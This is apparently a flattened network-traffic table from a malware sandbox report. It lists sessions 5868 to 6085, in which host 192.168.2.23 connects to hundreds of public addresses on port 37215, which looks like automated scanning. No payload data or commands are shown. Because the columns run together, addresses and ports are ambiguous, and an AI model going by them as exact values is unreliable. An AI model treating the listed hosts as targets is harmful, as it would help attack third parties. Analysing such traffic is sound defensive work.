                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5868192.168.2.2335388157.16.74.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5869192.168.2.2341688197.125.173.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5870192.168.2.2349480157.233.169.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5871192.168.2.2352096197.85.12.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5872192.168.2.2338994100.170.221.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5873192.168.2.2340970197.157.241.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5874192.168.2.234916612.114.128.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5875192.168.2.233536241.55.35.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5876192.168.2.2341780157.172.63.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5877192.168.2.23380062.41.153.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5878192.168.2.233625641.150.111.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5879192.168.2.233603641.238.55.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5880192.168.2.234972270.193.26.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5881192.168.2.2358574197.94.101.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5882192.168.2.234122088.240.154.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5883192.168.2.234830241.156.210.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5884192.168.2.2346314157.4.105.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5885192.168.2.2346182197.202.207.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5886192.168.2.235195494.99.105.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5887192.168.2.2357864185.59.47.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5888192.168.2.235948084.108.191.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5889192.168.2.2348868197.66.214.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5890192.168.2.233747241.24.84.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5891192.168.2.2348020157.95.158.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5892192.168.2.2357754197.104.121.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5893192.168.2.2341358157.215.13.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5894192.168.2.2346708197.209.32.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5895192.168.2.2334184157.11.69.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5896192.168.2.2337356197.33.241.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5897192.168.2.2348136197.8.158.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5898192.168.2.2351352197.10.105.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5899192.168.2.235572241.22.81.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5900192.168.2.2341442157.188.199.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5901192.168.2.2348256118.86.63.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5902192.168.2.233465641.187.9.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5903192.168.2.2335820157.17.194.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5904192.168.2.234292820.82.219.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5905192.168.2.2343534197.191.67.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5906192.168.2.235670441.239.243.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5907192.168.2.234319041.168.93.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5908192.168.2.2356748157.124.182.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5909192.168.2.2360166197.205.239.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5910192.168.2.2344986197.123.48.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5911192.168.2.234885241.213.174.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5912192.168.2.2349732157.71.30.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5913192.168.2.233492241.73.2.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5914192.168.2.2334958176.235.252.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5915192.168.2.234601041.114.77.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5916192.168.2.2335300157.214.51.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5917192.168.2.2351068157.110.240.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5918192.168.2.234898241.252.206.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5919192.168.2.2336970157.234.234.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5920192.168.2.2335888155.103.251.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5921192.168.2.2348996197.177.202.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5922192.168.2.2356944198.96.31.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5923192.168.2.2346850197.35.77.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5924192.168.2.2359798197.230.135.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5925192.168.2.2343818197.251.200.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5926192.168.2.2352472157.187.72.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5927192.168.2.2333076197.107.145.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5928192.168.2.2352728197.9.249.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5929192.168.2.2359770125.174.94.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5930192.168.2.2350976157.63.63.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5931192.168.2.236079041.47.106.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5932192.168.2.2349286197.153.247.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5933192.168.2.2337378196.126.76.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5934192.168.2.2337394157.229.30.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5935192.168.2.234974241.74.67.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5936192.168.2.2347932132.168.159.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5937192.168.2.233638263.183.46.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5938192.168.2.2341994157.119.138.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5939192.168.2.2347362197.90.33.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5940192.168.2.2333978197.134.23.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5941192.168.2.2358668197.38.198.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5942192.168.2.2360480157.141.248.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5943192.168.2.2339152157.111.62.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5944192.168.2.2343274177.35.254.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5945192.168.2.234483087.241.100.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5946192.168.2.2351292146.194.26.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5947192.168.2.234406841.19.91.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5948192.168.2.2357640144.74.92.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5949192.168.2.234959441.142.60.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5950192.168.2.2360486197.59.231.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5951192.168.2.233473441.73.167.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5952192.168.2.2338740157.105.76.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5953192.168.2.2353788197.55.87.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5954192.168.2.2358386157.236.28.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5955192.168.2.235696441.200.115.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5956192.168.2.233875414.100.149.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5957192.168.2.2343560197.41.52.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5958192.168.2.2355232157.43.65.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5959192.168.2.234300241.224.178.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5960192.168.2.234394441.72.118.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5961192.168.2.235243041.165.90.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5962192.168.2.2342030157.165.121.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5963192.168.2.2344068186.78.30.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5964192.168.2.2337424197.58.167.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5965192.168.2.2350006197.138.105.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5966192.168.2.233555841.31.127.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5967192.168.2.2356906187.112.79.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5968192.168.2.2359210123.81.60.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5969192.168.2.234916098.29.225.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5970192.168.2.2334620151.8.224.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5971192.168.2.2354042149.205.0.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5972192.168.2.2340610197.120.17.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5973192.168.2.2342450197.51.135.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5974192.168.2.2356468157.151.13.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5975192.168.2.235774241.65.222.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5976192.168.2.233749091.152.114.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5977192.168.2.2332958157.85.56.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5978192.168.2.233436041.222.10.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5979192.168.2.2337260197.58.250.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5980192.168.2.2349574157.44.166.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5981192.168.2.2354496197.87.159.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5982192.168.2.2359758197.189.7.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5983192.168.2.2351518221.175.251.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5984192.168.2.234612441.78.194.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5985192.168.2.234003241.166.154.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5986192.168.2.2339802197.217.200.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5987192.168.2.2333884157.38.224.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5988192.168.2.2352806157.135.138.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5989192.168.2.2349704197.141.115.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5990192.168.2.2356310157.206.227.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5991192.168.2.235207241.242.211.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5992192.168.2.2350940157.193.74.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5993192.168.2.2342780197.6.200.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5994192.168.2.235079886.195.145.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5995192.168.2.2339078197.185.105.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5996192.168.2.235877241.186.70.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5997192.168.2.235474841.255.89.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5998192.168.2.2344492197.155.136.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5999192.168.2.2335928157.137.151.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6000192.168.2.234872641.158.6.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6001192.168.2.2338870157.184.85.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6002192.168.2.2342356157.129.233.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6003192.168.2.2336894157.238.191.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6004192.168.2.233690641.124.127.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6005192.168.2.2355898157.72.200.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6006192.168.2.2360930157.200.255.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6007192.168.2.2345936157.221.0.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6008192.168.2.2337674157.161.237.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6009192.168.2.2347582197.117.18.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6010192.168.2.2359800197.5.84.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6011192.168.2.2351438157.50.70.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6012192.168.2.2334284197.199.207.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6013192.168.2.2347766220.89.20.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6014192.168.2.235265841.192.219.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6015192.168.2.2333876157.43.156.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6016192.168.2.2358802157.182.163.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6017192.168.2.2335376197.0.17.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6018192.168.2.2355032197.71.135.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6019192.168.2.2353152157.25.85.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6020192.168.2.234631241.56.105.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6021192.168.2.234005895.209.163.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6022192.168.2.2346868157.104.225.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6023192.168.2.2340254121.118.81.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6024192.168.2.2351876157.91.52.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6025192.168.2.2346944132.102.196.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6026192.168.2.2349166197.115.176.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6027192.168.2.2357474197.189.227.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6028192.168.2.2335642197.209.189.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6029192.168.2.2340712217.83.99.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6030192.168.2.236013641.105.233.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6031192.168.2.2350016197.164.246.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6032192.168.2.2341162197.255.53.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6033192.168.2.2335942197.146.49.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6034192.168.2.2356710157.196.181.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6035192.168.2.234092441.69.164.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6036192.168.2.2336266157.185.182.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6037192.168.2.2348858197.210.82.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6038192.168.2.2342170161.94.231.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6039192.168.2.2337564157.236.130.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6040192.168.2.234817841.52.80.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6041192.168.2.235854841.244.97.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6042192.168.2.233701685.124.207.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6043192.168.2.2345956176.141.143.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6044192.168.2.2356332157.32.254.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6045192.168.2.235907441.41.187.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6046192.168.2.2359488157.196.15.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6047192.168.2.234101041.102.142.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6048192.168.2.2334588157.51.31.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6049192.168.2.2333408131.140.144.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6050192.168.2.235251241.108.131.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6051192.168.2.233667441.173.62.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6052192.168.2.234616638.44.149.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6053192.168.2.2348860197.24.75.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6054192.168.2.233899485.57.93.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6055192.168.2.2335670197.0.76.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6056192.168.2.235068890.71.150.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6057192.168.2.235872284.89.143.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6058192.168.2.2357468203.126.53.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6059192.168.2.2347718153.157.164.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6060192.168.2.234986441.94.230.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6061192.168.2.233966857.87.175.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6062192.168.2.2352172157.108.158.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6063192.168.2.2339790153.125.107.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6064192.168.2.235048890.91.151.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6065192.168.2.233534041.172.242.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6066192.168.2.2353884157.9.78.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6067192.168.2.235629241.34.12.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6068192.168.2.2336998157.20.1.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6069192.168.2.2352626107.68.175.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6070192.168.2.235411050.11.176.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6071192.168.2.2349142157.165.43.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6072192.168.2.2351730122.43.250.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6073192.168.2.2356866157.122.118.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6074192.168.2.234661641.121.77.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6075192.168.2.2349270197.160.135.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6076192.168.2.234597641.97.194.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6077192.168.2.235513241.39.122.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6078192.168.2.2342350178.66.15.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6079192.168.2.233525841.116.0.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6080192.168.2.2335038197.216.242.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6081192.168.2.236021041.33.45.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6082192.168.2.2333056197.11.89.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6083192.168.2.2342802197.252.200.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6084192.168.2.234613041.40.98.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6085192.168.2.2333462169.112.223.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
